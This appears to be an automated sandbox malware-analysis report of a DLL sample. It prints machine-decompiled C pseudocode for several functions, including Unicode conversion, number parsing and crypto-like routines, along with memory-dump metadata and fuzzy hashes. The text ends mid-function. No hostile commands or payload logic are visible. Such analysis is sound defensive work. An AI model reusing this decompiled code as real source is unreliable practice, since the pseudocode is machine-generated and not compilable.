				 *((long long*)(_t147 - 0x30)) = __rcx;
				if (_t88 == 0) goto 0xf309ac28;
				if (_t88 < 0) goto 0xf309aebb;
				E000007FE7FEF305A520();
				if (__rax != 0) goto 0xf309ac2e;
				E000007FE7FEF30FDDD0(__edx, __rax, __rax, __r8, _t116, __r8);
				asm("ud2");
				r13d = 1;
				 *((long long*)(_t147 - 0x28)) = __rax;
				 *((long long*)(_t147 - 0x20)) = __r8;
				 *((long long*)(_t147 - 0x18)) = 0;
				 *((char*)(_t147 - 0x10)) = 1;
				_t155 =  &(__rdx[__r8]);
				r12d = 0;
				if (r12w != 0) goto 0xf309ac88;
				goto 0xf309ac90;
				asm("o16 nop [cs:eax+eax]");
				E000007FE7FEF30F1E10();
				_t118 =  *((intOrPtr*)(_t147 - 0x18)) + __r8;
				 *((long long*)(_t147 - 0x18)) = _t118;
				r12d = 0;
				if (r12w == 0) goto 0xf309ac90;
				goto 0xf309aca0;
				if (__rdx == _t155) goto 0xf309ae97;
				_t82 =  *__rdx & 0x0000ffff;
				_t143 =  &(__rdx[1]);
				if ((_t82 & 0x0000f800) != 0xd800) goto 0xf309ad20;
				r15d = _t82 & 0x0000ffff;
				if (r15d - 0xdbff > 0) goto 0xf309ae14;
				if (_t143 == _t155) goto 0xf309ae19;
				if ((( *_t143 & 0x0000ffff) + 0x00002000 & 0x0000ffff) - 0xfc00 < 0) goto 0xf309ae21;
				_t83 = _t82 + 0x2800;
				_t68 = _t83 & 0x0000ffff;
				goto 0xf309ad27;
				asm("o16 nop [cs:eax+eax]");
				 *(_t147 - 4) = 0;
				if (_t68 - 0x80 >= 0) goto 0xf309ad50;
				 *(_t147 - 4) = _t68;
				goto 0xf309adf0;
				asm("o16 nop [eax+eax]");
				if (_t68 - 0x800 >= 0) goto 0xf309ad80;
				_t53 = _t83 & 0x0000ffff | 0x000000c0;
				 *(_t147 - 4) = _t53;
				_t70 = _t68 & 0x0000003f | 0x00000080;
				 *(_t147 - 3) = _t70;
				goto 0xf309adf0;
				asm("o16 nop [cs:eax+eax]");
				if (_t70 - 0x10000 >= 0) goto 0xf309adb0;
				_t76 = __edx | 0x000000e0;
				 *(_t147 - 4) = _t76;
				_t55 = _t53 & 0x0000003f | 0x00000080;
				 *(_t147 - 3) = _t55;
				_t72 = _t70 & 0x0000003f | 0x00000080;
				 *(_t147 - 2) = _t72;
				goto 0xf309adf0;
				_t78 = _t76 & 0x00000007 | 0x000000f0;
				 *(_t147 - 4) = _t78;
				 *(_t147 - 3) = _t78 & 0x0000003f | 0x00000080;
				 *(_t147 - 2) = _t55 & 0x0000003f | 0x00000080;
				 *(_t147 - 1) = _t72 & 0x0000003f | 0x00000080;
				asm("o16 nop [cs:eax+eax]");
				if ( *((intOrPtr*)(_t147 - 0x20)) - _t118 - __r8 >= 0) goto 0xf309ac68;
				_t29 = _t147 - 0x28; // -39
				_t58 = E000007FE7FEF30FFA10(_t72 & 0x0000003f | 0x00000080, _t78 & 0x0000003f | 0x00000080,  *((intOrPtr*)(_t147 - 0x20)) - _t118 - __r8, _t29, _t118, __r8);
				goto 0xf309ac60;
				r12d = 0;
				goto 0xf309ae2a;
				r12d = 0;
				goto 0xf309ae2a;
				r12w = 1;
				 *((short*)(_t147 - 6)) = _t58;
				 *((char*)(_t147 - 0x10)) = 0;
				if ( *((intOrPtr*)(_t147 - 0x20)) - _t118 - 2 > 0) goto 0xf309ae51;
				r8d = 3;
				_t33 = _t147 - 0x28; // -39
				E000007FE7FEF30FFA10(_t72 & 0x0000003f | 0x00000080, _t78 & 0x0000003f | 0x00000080,  *((intOrPtr*)(_t147 - 0x20)) - _t118 - 2, _t33, _t118, __r8);
				_t119 =  *((intOrPtr*)(_t147 - 0x18));
				_t62 = r15d >> 0x0000000c | 0x000000e0;
				r15d = r15d >> 6;
				r15b = r15b & 0x0000003f;
				r15b = r15b | 0x00000080;
				sil = sil & 0x0000003f;
				sil = sil | 0x00000080;
				_t154 =  *((intOrPtr*)(_t147 - 0x28));
				 *(_t154 + _t119) = _t62;
				 *(_t154 + _t119 + 1) = r15b;
				 *(_t154 + _t119 + 2) = sil;
				 *((long long*)(_t147 - 0x18)) = _t119 + 3;
				if (r12w != 0) goto 0xf309ac88;
				goto 0xf309ac90;
				asm("movups xmm0, [ebp-0x28]");
				asm("movups xmm1, [ebp-0x18]");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax], xmm0");
				return _t62;
			}

0x7fef309abe0
0x7fef309abe5
0x7fef309abf3
0x7fef309abf6
0x7fef309abfa
0x7fef309abff
0x7fef309ac0e
0x7fef309ac19
0x7fef309ac21
0x7fef309ac26
0x7fef309ac28
0x7fef309ac2e
0x7fef309ac32
0x7fef309ac36
0x7fef309ac3e
0x7fef309ac42
0x7fef309ac48
0x7fef309ac4f
0x7fef309ac51
0x7fef309ac53
0x7fef309ac73
0x7fef309ac78
0x7fef309ac7b
0x7fef309ac7f
0x7fef309ac86
0x7fef309ac8e
0x7fef309ac93
0x7fef309ac99
0x7fef309ac9c
0x7fef309acac
0x7fef309acae
0x7fef309acb9
0x7fef309acc2
0x7fef309ace0
0x7fef309ace6
0x7fef309acec
0x7fef309ad0f
0x7fef309ad11
0x7fef309ad2e
0x7fef309ad3b
0x7fef309ad3d
0x7fef309ad45
0x7fef309ad4a
0x7fef309ad56
0x7fef309ad5c
0x7fef309ad5e
0x7fef309ad64
0x7fef309ad67
0x7fef309ad6f
0x7fef309ad71
0x7fef309ad89
0x7fef309ad8f
0x7fef309ad92
0x7fef309ad9b
0x7fef309ad9d
0x7fef309ada3
0x7fef309ada6
0x7fef309adae
0x7fef309adb7
0x7fef309adba
0x7fef309adca
0x7fef309add5
0x7fef309adde
0x7fef309ade6
0x7fef309adfa
0x7fef309ae00
0x7fef309ae0a
0x7fef309ae0f
0x7fef309ae14
0x7fef309ae17
0x7fef309ae19
0x7fef309ae1f
0x7fef309ae21
0x7fef309ae26
0x7fef309ae2a
0x7fef309ae39
0x7fef309ae3b
0x7fef309ae41
0x7fef309ae48
0x7fef309ae4d
0x7fef309ae57
0x7fef309ae59
0x7fef309ae5d
0x7fef309ae61
0x7fef309ae65
0x7fef309ae69
0x7fef309ae6d
0x7fef309ae71
0x7fef309ae76
0x7fef309ae7b
0x7fef309ae84
0x7fef309ae8c
0x7fef309ae92
0x7fef309ae97
0x7fef309ae9b
0x7fef309aea3
0x7fef309aea7
0x7fef309aeba

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1a6459bdf5ac80f7f048c6cf43ef1e5909bd1614723f9bdb61215700dce2f8f6
Instruction ID: 78e6269123346c07b3a8f9fb074d5391ddd175c833e7c2caeab9223db3451a31
Opcode Fuzzy Hash: 1a6459bdf5ac80f7f048c6cf43ef1e5909bd1614723f9bdb61215700dce2f8f6
Instruction Fuzzy Hash: 79716763F1A7518EFB418B7998413FE3BA2A3147A8F045632DE4E177DAE63C9181E350

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3059712 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31470dc278584963233204233254c16bcba4f19c08dc56dc02cce817a11016f0
Instruction ID: 4c1e4724a5220b1ed2d95aba3d0bbeb5c823825dc40e52d23886f75c6d764460
Opcode Fuzzy Hash: 31470dc278584963233204233254c16bcba4f19c08dc56dc02cce817a11016f0
Instruction Fuzzy Hash: 9D9122F7D19B8846E643433E94456AA7790BFAA3A8F05D712EFF4326E1C7296560A300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EDEF0 Relevance: .2, Instructions: 186
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E000007FE7FEF30EDEF0(signed int __edx, void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				signed int _t136;
				void* _t138;
				signed long long _t148;
				signed long long _t149;
				void* _t187;
				void* _t189;
				void* _t194;
				void* _t197;

				 *((long long*)(_t189 + 0x10)) = __rbx;
				 *((long long*)(_t189 + 0x18)) = __rsi;
				 *((long long*)(_t189 + 0x20)) = __rdi;
				_t187 = _t189 - 0x47;
				_t148 =  *0xf319c428; // 0x2fa980d671f5
				_t149 = _t148 ^ _t189 - 0x000000e0;
				 *(_t187 + 0x37) = _t149;
				asm("xorps xmm0, xmm0");
				asm("movups [ecx], xmm0");
				asm("movups [ecx+0x10], xmm0");
				 *(__rcx + 0x20) = _t149;
				 *__rcx = 1;
				asm("movups [ecx+0x28], xmm0");
				asm("movups [ecx+0x38], xmm0");
				 *(__rcx + 0x48) = _t149;
				 *((intOrPtr*)(__rcx + 0x28)) = 1;
				asm("movups [ecx+0x50], xmm0");
				asm("movups [ecx+0x60], xmm0");
				 *(__rcx + 0x70) = _t149;
				r8b = r8b - ( ~(sil & 0xffffffff) & r8b) + ( ~(sil & 0xffffffff) & r8b);
				_t136 = r8b & 0xffffffff;
				r8d = _t136;
				r8d = r8d ^ 0x00000001;
				r8d = r8d - 1;
				_t192 = __edx * 0x3c0;
				r8d = r8d >> 0x1f;
				_t91 = E000007FE7FEF30EB020(( ~(sil & 0xffffffff) & r8b) + ( ~(sil & 0xffffffff) & r8b), __rcx, 0xf315f9c0 + __edx * 0x3c0);
				r8d = _t136;
				r8d = r8d ^ 0x00000002;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t92 = E000007FE7FEF30EB020(_t91, __rcx, 0x7fef315fa38 + __edx * 0x3c0);
				r8d = _t136;
				r8d = r8d ^ 0x00000003;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t93 = E000007FE7FEF30EB020(_t92, __rcx, 0x7fef315fab0 + __edx * 0x3c0);
				r8d = _t136;
				r8d = r8d ^ 0x00000004;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t94 = E000007FE7FEF30EB020(_t93, __rcx, 0x7fef315fb28 + __edx * 0x3c0);
				r8d = _t136;
				r8d = r8d ^ 0x00000005;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t95 = E000007FE7FEF30EB020(_t94, __rcx, 0x7fef315fba0 + _t192);
				r8d = _t136;
				r8d = r8d ^ 0x00000006;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t96 = E000007FE7FEF30EB020(_t95, __rcx, 0x7fef315fc18 + _t192);
				r8d = _t136;
				r8d = r8d ^ 0x00000007;
				r8d = r8d - 1;
				r8d = r8d >> 0x1f;
				_t97 = E000007FE7FEF30EB020(_t96, __rcx, 0x7fef315fc90 + _t192);
				r8d = __rbx - 1;
				r8d = r8d >> 0x1f;
				E000007FE7FEF30EB020(_t97, __rcx, 0x7fef315fd08 + _t192);
				 *((intOrPtr*)(_t187 - 0x49)) =  *((intOrPtr*)(__rcx + 0x28));
				 *((intOrPtr*)(_t187 - 0x45)) =  *((intOrPtr*)(__rcx + 0x2c));
				 *((intOrPtr*)(_t187 - 0x41)) =  *((intOrPtr*)(__rcx + 0x30));
				 *((intOrPtr*)(_t187 - 0x3d)) =  *((intOrPtr*)(__rcx + 0x34));
				 *((intOrPtr*)(_t187 - 0x39)) =  *((intOrPtr*)(__rcx + 0x38));
				 *((intOrPtr*)(_t187 - 0x35)) =  *((intOrPtr*)(__rcx + 0x3c));
				 *((intOrPtr*)(_t187 - 0x31)) =  *((intOrPtr*)(__rcx + 0x40));
				 *((intOrPtr*)(_t187 - 0x2d)) =  *((intOrPtr*)(__rcx + 0x44));
				 *(_t187 - 0x29) =  *(__rcx + 0x48);
				 *((intOrPtr*)(_t187 - 0x25)) =  *((intOrPtr*)(__rcx + 0x4c));
				 *((intOrPtr*)(_t187 - 0x21)) =  *__rcx;
				 *((intOrPtr*)(_t187 - 0x1d)) =  *((intOrPtr*)(__rcx + 4));
				 *((intOrPtr*)(_t187 - 0x19)) =  *((intOrPtr*)(__rcx + 8));
				 *((intOrPtr*)(_t187 - 0x15)) =  *((intOrPtr*)(__rcx + 0xc));
				 *((intOrPtr*)(_t187 - 0x11)) =  *((intOrPtr*)(__rcx + 0x10));
				 *((intOrPtr*)(_t187 - 0xd)) =  *((intOrPtr*)(__rcx + 0x14));
				 *((intOrPtr*)(_t187 - 9)) =  *((intOrPtr*)(__rcx + 0x18));
				 *((intOrPtr*)(_t187 - 5)) =  *((intOrPtr*)(__rcx + 0x1c));
				 *(_t187 - 1) =  *(__rcx + 0x20);
				 *((intOrPtr*)(_t187 + 3)) =  *((intOrPtr*)(__rcx + 0x24));
				E000007FE7FEF30EB1D0(__rbx, _t187 - 0x79, __rcx + 0x50, __rdi, __rsi, _t187, _t197, _t194);
				r9d = 0x3fffffe;
				r8d = sil & 0xffffffff;
				 *((intOrPtr*)(_t187 + 0xb)) = r9d -  *((intOrPtr*)(_t187 - 0x75));
				 *((intOrPtr*)(_t187 + 7)) = 0x7ffffda -  *((intOrPtr*)(_t187 - 0x79));
				 *((intOrPtr*)(_t187 + 0xf)) = 0x7fffffe -  *((intOrPtr*)(_t187 - 0x71));
				 *((intOrPtr*)(_t187 + 0x13)) = r9d -  *((intOrPtr*)(_t187 - 0x6d));
				 *((intOrPtr*)(_t187 + 0x17)) = 0x7fffffe -  *((intOrPtr*)(_t187 - 0x69));
				 *((intOrPtr*)(_t187 + 0x1b)) = r9d -  *((intOrPtr*)(_t187 - 0x65));
				 *((intOrPtr*)(_t187 + 0x1f)) = 0x7fffffe -  *((intOrPtr*)(_t187 - 0x61));
				r9d = r9d -  *((intOrPtr*)(_t187 - 0x55));
				 *((intOrPtr*)(_t187 + 0x27)) = 0x7fffffe -  *((intOrPtr*)(_t187 - 0x59));
				 *((intOrPtr*)(_t187 + 0x2b)) = r9d;
				 *((intOrPtr*)(_t187 + 0x23)) = r9d -  *((intOrPtr*)(_t187 - 0x5d));
				return E000007FE7FEF30F1360(E000007FE7FEF30EB020(r9d -  *((intOrPtr*)(_t187 - 0x5d)), __rcx, _t187 - 0x49), _t138,  *(_t187 + 0x37) ^ _t189 - 0x000000e0);
			}

0x7fef30edef0
0x7fef30edef5
0x7fef30edefa
0x7fef30edf04
0x7fef30edf10
0x7fef30edf17
0x7fef30edf1a
0x7fef30edf24
0x7fef30edf2a
0x7fef30edf37
0x7fef30edf3b
0x7fef30edf3f
0x7fef30edf45
0x7fef30edf49
0x7fef30edf4d
0x7fef30edf51
0x7fef30edf58
0x7fef30edf5c
0x7fef30edf60
0x7fef30edf6f
0x7fef30edf75
0x7fef30edf79
0x7fef30edf7c
0x7fef30edf80
0x7fef30edf83
0x7fef30edf8a
0x7fef30edf92
0x7fef30edf97
0x7fef30edf9e
0x7fef30edfa5
0x7fef30edfab
0x7fef30edfaf
0x7fef30edfb4
0x7fef30edfbe
0x7fef30edfc5
0x7fef30edfcb
0x7fef30edfcf
0x7fef30edfd4
0x7fef30edfde
0x7fef30edfe5
0x7fef30edfeb
0x7fef30edfef
0x7fef30edff4
0x7fef30edffe
0x7fef30ee005
0x7fef30ee00b
0x7fef30ee00f
0x7fef30ee014
0x7fef30ee01e
0x7fef30ee025
0x7fef30ee02b
0x7fef30ee02f
0x7fef30ee034
0x7fef30ee03e
0x7fef30ee045
0x7fef30ee04b
0x7fef30ee04f
0x7fef30ee057
0x7fef30ee062
0x7fef30ee06c
0x7fef30ee079
0x7fef30ee084
0x7fef30ee08b
0x7fef30ee092
0x7fef30ee099
0x7fef30ee0a0
0x7fef30ee0a7
0x7fef30ee0ae
0x7fef30ee0b5
0x7fef30ee0bc
0x7fef30ee0c2
0x7fef30ee0c9
0x7fef30ee0d0
0x7fef30ee0d7
0x7fef30ee0de
0x7fef30ee0e5
0x7fef30ee0ec
0x7fef30ee0f3
0x7fef30ee0fa
0x7fef30ee101
0x7fef30ee104
0x7fef30ee109
0x7fef30ee11d
0x7fef30ee121
0x7fef30ee127
0x7fef30ee134
0x7fef30ee13d
0x7fef30ee145
0x7fef30ee14e
0x7fef30ee159
0x7fef30ee162
0x7fef30ee166
0x7fef30ee16d
0x7fef30ee171
0x7fef30ee1a1

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957f32b0414791ff6703c0c2bc5a37431d26ee17edcd0c1fc38667c817b5870d
Instruction ID: 2884e10fedb61751efb37ff472ef1ff5ee7155e439c16ef8fe10dd175eafdbe4
Opcode Fuzzy Hash: 957f32b0414791ff6703c0c2bc5a37431d26ee17edcd0c1fc38667c817b5870d
Instruction Fuzzy Hash: 988128B3F246518FE7A0CF78D044A9D37F5F748748B42A22AEE0897B19E636E545CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C98D0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17d4ee52cfcd009d624995e0f602ae767e8f75982d766da665b931c226bfe9f
Instruction ID: eb7e3739e75b8146ea9b75f06d63c1a2346490292b7259dc720c9c772e378da1
Opcode Fuzzy Hash: a17d4ee52cfcd009d624995e0f602ae767e8f75982d766da665b931c226bfe9f
Instruction Fuzzy Hash: 94817E32C0DB8289F7877775449736492A15FF3294F50C723FDA9719B7DB28BA88A110

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EED60 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d33ba1bacac2c0cab12502c757dea297040062b278887260302228285dfe8c
Instruction ID: 3f3eaac9a50d8fd4c587bea695e12201e6ec3086a18eb7aa3d5dc0393488ea4d
Opcode Fuzzy Hash: 92d33ba1bacac2c0cab12502c757dea297040062b278887260302228285dfe8c
Instruction Fuzzy Hash: 59719A73A11B858ADB508F39D8403E837A1F7597A8F009326EEAC57B99DB38D264C340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3058850 Relevance: .2, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E000007FE7FEF3058850(void* __ebx, void* __rax, signed char* __rcx, void* __rdx, void* __r8, void* __r11) {
				signed int _v116;
				signed int _t22;
				void* _t40;
				signed int _t50;
				void* _t68;
				void* _t77;
				signed int _t80;
				void* _t83;
				signed int _t85;
				signed char* _t91;
				void* _t94;
				void* _t96;
				void* _t97;
				void* _t101;

				_v116 = r8d;
				if (__r8 - 2 - 0x22 > 0) goto 0xf3058a18;
				r11d = 1;
				if (__rdx == 0) goto 0xf3058897;
				_t22 =  *__rcx & 0x000000ff;
				if (_t22 == 0x2d) goto 0xf30588a2;
				_t68 = _t22 - 0x2b;
				if (_t68 != 0) goto 0xf30588b6;
				_t101 = __rdx - 1;
				if (_t68 == 0) goto 0xf30589f9;
				_t91 =  &(__rcx[1]);
				goto 0xf30588b6;
				r10d = 0;
				r15d = 0;
				goto 0xf3058a02;
				if (_t101 != 1) goto 0xf30588b6;
				r15d = 0x100;
				r10d = 0;
				goto 0xf3058a02;
				if (r8d - 0x10 > 0) goto 0xf3058916;
				if (_t101 - 9 >= 0) goto 0xf3058916;
				r10d = 0;
				if (r8d - 0xa <= 0) goto 0xf3058983;
				goto 0xf30588f2;
				asm("o16 nop [eax+eax]");
				_t97 = _t96 + 1;
				if (_t101 == _t97) goto 0xf30589aa;
				if (_t94 - 0x30 - 0xa < 0) goto 0xf30588e0;
				_t50 =  <  ? 0xffffffff : (_t91[_t97] & 0x000000ff | 0x00000020) + 0xffffffa9;
				if (_t50 - r8d < 0) goto 0xf30588e0;
				goto 0xf30589fc;
				r10d = 0;
				if (r8d - 0xa <= 0) goto 0xf30589b9;
				r14d = 0xffffffff;
				r15d = 0x200;
				asm("o16 nop [cs:eax+eax]");
				_t77 = _t101 - _t94;
				if (_t77 == 0) goto 0xf30589aa;
				_t12 = _t97 - 0x30; // 0xffffffcf
				if (_t12 - 0xa < 0) goto 0xf305896f;
				_t59 =  <  ? r14d : (_t91[_t94] & 0x000000ff | 0x00000020) + 0xffffffa9;
				if (( <  ? r14d : (_t91[_t94] & 0x000000ff | 0x00000020) + 0xffffffa9) - r8d >= 0) goto 0xf30589fc;
				_t80 = _t50 & 0xffffff00 | _t77 > 0x00000000;
				if (_t80 != 0) goto 0xf3058a02;
				if (_t80 >= 0) goto 0xf3058940;
				goto 0xf3058a02;
				asm("o16 nop [eax+eax]");
				if ((_t91[__rdx] & 0x000000ff) + 0xffffffd0 - r8d >= 0) goto 0xf30589fc;
				if (_t101 != __rdx + 1) goto 0xf3058990;
				r15d = 0;
				r11d = 0;
				goto 0xf3058a02;
				r15d = 0x200;
				asm("o16 nop [cs:eax+eax]");
				_t83 = _t101 - _t97;
				if (_t83 == 0) goto 0xf30589aa;
				_t40 = (_t91[_t97] & 0x000000ff) + 0xffffffd0;
				_t52 =  <  ? _t40 : 0;
				if (_t40 - r8d >= 0) goto 0xf30589fc;
				_t85 = 0 * r8d >> 0x00000020 & 0xffffff00 | _t83 > 0x00000000;
				if (_t85 != 0) goto 0xf3058a02;
				_t34 = 0 * r8d + ( <  ? _t40 : 0);
				if (_t85 >= 0) goto 0xf30589d0;
				goto 0xf3058a02;
				r10d = 0;
				r15d = 0x100;
				return 0 * r8d + ( <  ? _t40 : 0);
			}

0x7fef305885c
0x7fef3058868
0x7fef3058871
0x7fef305887a
0x7fef305887c
0x7fef3058882
0x7fef3058884
0x7fef3058887
0x7fef3058889
0x7fef305888c
0x7fef3058892
0x7fef3058895
0x7fef3058897
0x7fef305889a
0x7fef305889d
0x7fef30588a6
0x7fef30588a8
0x7fef30588ae
0x7fef30588b1
0x7fef30588ba
0x7fef30588c0
0x7fef30588c2
0x7fef30588c9
0x7fef30588d8
0x7fef30588da
0x7fef30588e6
0x7fef30588ec
0x7fef30588fc
0x7fef3058907
0x7fef305890f
0x7fef3058911
0x7fef3058916
0x7fef305891d
0x7fef3058923
0x7fef305892d
0x7fef3058933
0x7fef3058940
0x7fef3058943
0x7fef305894f
0x7fef3058955
0x7fef3058960
0x7fef3058969
0x7fef305896f
0x7fef3058971
0x7fef305897c
0x7fef305897e
0x7fef3058987
0x7fef305899a
0x7fef30589a8
0x7fef30589ae
0x7fef30589b4
0x7fef30589b7
0x7fef30589bd
0x7fef30589c3
0x7fef30589d0
0x7fef30589d3
0x7fef30589df
0x7fef30589e5
0x7fef30589e8
0x7fef30589ea
0x7fef30589ec
0x7fef30589f1
0x7fef30589f5
0x7fef30589f7
0x7fef30589f9
0x7fef30589fc
0x7fef3058a17

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9fa8600653433f5b3aca34f436a2ce73c7fb29c1e39d16cdb5353729e37c064
Instruction ID: 5936bac2265dae43f90776a818e9f6ce0458fedbedebf26a7e67bebf4b127e25
Opcode Fuzzy Hash: a9fa8600653433f5b3aca34f436a2ce73c7fb29c1e39d16cdb5353729e37c064
Instruction Fuzzy Hash: FB515673F1C66249F7E14A24A884B79B5C3A381394F595333DD9E426F0F33DE581A241

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7400 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aaa79863a1262bd60ef00dbc3f7f7e316d1c921ad3ce433f270a41df65b81f0
Instruction ID: 7ea6541a9b5ea288b864ebf74156194657eaaf311960c20dc84ca4c8f92f1b05
Opcode Fuzzy Hash: 5aaa79863a1262bd60ef00dbc3f7f7e316d1c921ad3ce433f270a41df65b81f0
Instruction Fuzzy Hash: B0519B32F14F858AE710DB74E8022AD3365F799788F409726AE8D27B56DB38E291C340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30AA820 Relevance: .1, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E000007FE7FEF30AA820(void* __rcx, intOrPtr* __rdx, void* __r8, signed int __r10) {
				signed long long _t58;
				signed long long _t61;
				signed long long _t62;
				signed long long _t65;
				signed long long _t66;
				signed long long _t73;
				signed long long _t77;
				signed long long _t78;
				signed long long _t81;
				signed long long _t82;
				signed long long _t84;
				signed long long _t87;
				signed long long _t88;
				signed long long _t90;
				signed long long _t91;
				signed long long _t94;
				signed long long _t95;
				signed long long _t97;
				signed long long _t98;
				signed long long _t99;
				signed long long _t104;
				signed long long _t105;
				signed long long _t109;
				long long _t110;
				signed long long _t111;
				signed long long _t115;
				void* _t116;
				void* _t117;
				void* _t118;

